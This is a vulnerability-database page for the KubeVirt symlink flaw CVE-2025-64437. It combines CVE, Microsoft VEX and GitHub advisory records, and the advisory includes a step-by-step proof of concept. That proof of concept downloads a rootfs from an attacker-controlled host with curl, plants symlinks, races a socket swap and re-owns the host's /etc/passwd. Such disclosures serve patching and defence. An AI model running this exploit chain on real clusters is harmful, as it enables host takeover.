Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64437 (GCVE-0-2025-64437)
Vulnerability from cvelistv5 – Published: 2025-11-07 23:04 – Updated: 2025-11-10 18:50
VLAI?
EPSS
Summary
KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.
Severity ?
5 (Medium)
CWE
- CWE-59 - Improper Link Resolution Before File Access ('Link Following')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64437",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-10T18:49:35.550633Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-10T18:50:16.445Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kubevirt",
"vendor": "kubevirt",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.3"
},
{
"status": "affected",
"version": "\u003e= 1.6.0-alpha.0, \u003c 1.6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-59",
"description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T23:04:10.913Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265"
}
],
"source": {
"advisory": "GHSA-2r4r-5x78-mvqf",
"discovery": "UNKNOWN"
},
"title": "KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64437",
"datePublished": "2025-11-07T23:04:10.913Z",
"dateReserved": "2025-11-03T22:12:51.365Z",
"dateUpdated": "2025-11-10T18:50:16.445Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64437\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-07T23:15:46.147\",\"lastModified\":\"2025-11-25T17:16:45.050\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.\"},{\"lang\":\"es\",\"value\":\"KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. En versiones anteriores a la 1.5.3 y 1.6.1, el virt-handler no verifica si el launcher-sock es un enlace simb\u00f3lico o un archivo regular. Este descuido puede ser explotado, por ejemplo, para cambiar la propiedad de archivos arbitrarios en el nodo anfitri\u00f3n al usuario sin privilegios con UID 107 (el mismo usuario utilizado por virt-launcher), comprometiendo as\u00ed la CIA (Confidencialidad, Integridad y Disponibilidad) de los datos en el anfitri\u00f3n. Para explotar con \u00e9xito esta vulnerabilidad, un atacante deber\u00eda tener el control del sistema de archivos del pod virt-launcher. Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L\",\"baseScore\":5.0,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":0.8,\"impactScore\":3.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-59\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionEndExcluding\":\"1.5.3\",\"matchCriteriaId\":\"D06A16D0-A19D-4FC9-BBB2-DD155157AD8E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64437\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-10T18:49:35.550633Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-10T18:49:44.526Z\"}}], \"cna\": {\"title\": \"KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes\", \"source\": {\"advisory\": \"GHSA-2r4r-5x78-mvqf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 5, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"kubevirt\", \"product\": \"kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.5.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.6.0-alpha.0, \u003c 1.6.1\"}]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-59\", \"description\": \"CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-07T23:04:10.913Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64437\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-10T18:50:16.445Z\", \"dateReserved\": \"2025-11-03T22:12:51.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-07T23:04:10.913Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
MSRC_CVE-2025-64437
Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2025-12-07 01:48Summary
KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64437 KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64437.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes",
"tracking": {
"current_release_date": "2025-12-07T01:48:20.000Z",
"generator": {
"date": "2025-12-07T15:03:05.330Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-64437",
"initial_release_date": "2025-11-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-09T01:02:09.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2025-12-06T14:39:47.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2025-12-07T01:48:20.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
},
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-30",
"product": {
"name": "cbl2 kubevirt 0.59.0-30",
"product_id": "3"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product": {
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.0-5",
"product": {
"name": "azl3 kubevirt 1.5.0-5",
"product_id": "20656"
}
},
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-31",
"product": {
"name": "cbl2 kubevirt 0.59.0-31",
"product_id": "1"
}
}
],
"category": "product_name",
"name": "kubevirt"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
"product_id": "17086-3"
},
"product_reference": "3",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "17084-2"
},
"product_reference": "2",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "20656-17084"
},
"product_reference": "20656",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "17086-1"
},
"product_reference": "1",
"relates_to_product_reference": "17086"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64437",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0026#39;Link Following\u0026#39;)"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20656-17084"
],
"known_affected": [
"17086-3",
"17084-2",
"17086-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64437 KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64437.json"
}
],
"remediations": [
{
"category": "none_available",
"date": "2025-11-09T01:02:09.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-3"
]
},
{
"category": "none_available",
"date": "2025-11-09T01:02:09.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-1"
]
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:02:09.000Z",
"details": "1.5.3-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-2"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"environmentalsScore": 0.0,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"temporalScore": 5.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"17086-3",
"17084-2",
"17086-1"
]
}
],
"title": "KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes"
}
]
}
GHSA-2R4R-5X78-MVQF
Vulnerability from github – Published: 2025-11-06 23:36 – Updated: 2025-11-17 21:41
VLAI?
Summary
KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes
Details
Summary
_Short summary of the problem. Make the impact and severity as clear as possible.
It is possible to trick the virt-handler component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID 107 due to mishandling of symlinks when determining the root mount of a virt-launcher pod.
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
In the current implementation, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.
To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:
- A symbolic link (
launcher-sock) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries. - Another symbolic link (
disk.img) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem. - As a result, the ownership of an existing host file owned by root is changed to a less privileged user with UID 107.
It is assumed that an attacker has access to a virt-launcher pod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of the qemu user (UID=107). It is also assumed that they can create unprivileged user namespaces:
admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1
The below is inspired by an article, where the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.
# Download an container file system from an attacker-controlled location
qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar
# Create a directory and extract the file system in it
qemu-compromised@minikube:~$ mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine
# Create a MOUNT and remapped USER namespace environment and execute a shell process in it
qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh
# Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.
# The user is root in its new USER namesapce
root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root
# Swap the current root of the process and store the old one within a directory
root@minikube:~$ pivot_root . hostfs_root
root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin
# Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount
root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \
mkdir -p "${PVC_PATH}" && \
cd "${PVC_PATH}"
# Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory
root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img
# Create the socket wich will confuse the isolator detector and start listening on it
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
After the environment is set, the launcher-sock in the virt-launcher container should be replaced with a symlink to ../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509 is the PID of the above isolated shell process). This should be done, however, in a the right moment. For this demonstration, it was decided to trigger the bug while leveraging a race condition when creating or updating a VMI:
//pkg/virt-handler/vm.go
func (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {
// ...
//!!! MK: the change should happen here before executing the below line !!!
isolationRes, err := c.podIsolationDetector.Detect(vmi)
if err != nil {
return fmt.Errorf(failedDetectIsolationFmt, err)
}
virtLauncherRootMount, err := isolationRes.MountRoot()
if err != nil {
return err
}
// ...
// initialize disks images for empty PVC
hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
// MK: here the permissions are changed
err = hostDiskCreator.Create(vmi)
if err != nil {
return fmt.Errorf("preparing host-disks failed: %v", err)
}
// ...
The manifest of the #acr("vmi") which is going to trigger the bug is:
# The PVC will be used for the `disk.img` related bug
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: corrupted-pvc
spec:
accessModes:
- ReadWriteMany
resources:
requests:
storage: 500Mi
---
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
labels:
name: launcher-symlink-confusion
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: corrupted-pvc
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: corrupted-pvc
persistentVolumeClaim:
claimName: corrupted-pvc
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
Just before the line is executed, the attacker should replace the launcher-sock with a symlink to the bad.sock controlled by the isolated process:
# the namespaced process controlled by the attacker has pid=2245509
qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') && ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock
Upon successful exploitation, virt-launcher connects to the attacker controlled socket, misinterprets the root mount and changes the permissions of the host's /etc/passwd file:
# `virt-launcher` connects successfully
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
...
2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "<anon>" on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010
2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio
2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]
PRI * HTTP/2.0
admin@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd
admin@minikube:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
compromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash
The attacker controlling an unprivileged user can now update the contents of the file.
Impact
What kind of vulnerability is it? Who is impacted?
This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.
Severity ?
5.0 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0-alpha.0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64437"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-06T23:36:39Z",
"nvd_published_at": "2025-11-07T23:15:46Z",
"severity": "MODERATE"
},
"details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible.\n\nIt is possible to trick the `virt-handler` component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID `107` due to mishandling of symlinks when determining the root mount of a `virt-launcher` pod.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nIn the current implementation, the `virt-handler` does not verify whether the `launcher-sock` is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID `107` (the same user used by `virt-launcher`) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. \nTo successfully exploit this vulnerability, an attacker should be in control of the file system of the `virt-launcher` pod.\n\n\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nIn this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:\n\n1. A symbolic link (`launcher-sock`) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.\n2. Another symbolic link (`disk.img`) is employed to [alter the perceived location of data within a PVC](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq), redirecting it to a file owned by root on the host filesystem.\n3. As a result, [the ownership of an existing host file owned by root is changed to a less privileged user with UID 107](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh).\n\n\nIt is assumed that an attacker has access to a `virt-launcher` pod\u0027s file system (for example, [obtained using another vulnerability](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9)) and also has access to the host file system with the privileges of the `qemu` user (`UID=107`). It is also assumed that they can create unprivileged user namespaces:\n\n```bash\nadmin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1\n```\n\nThe below is inspired by [an 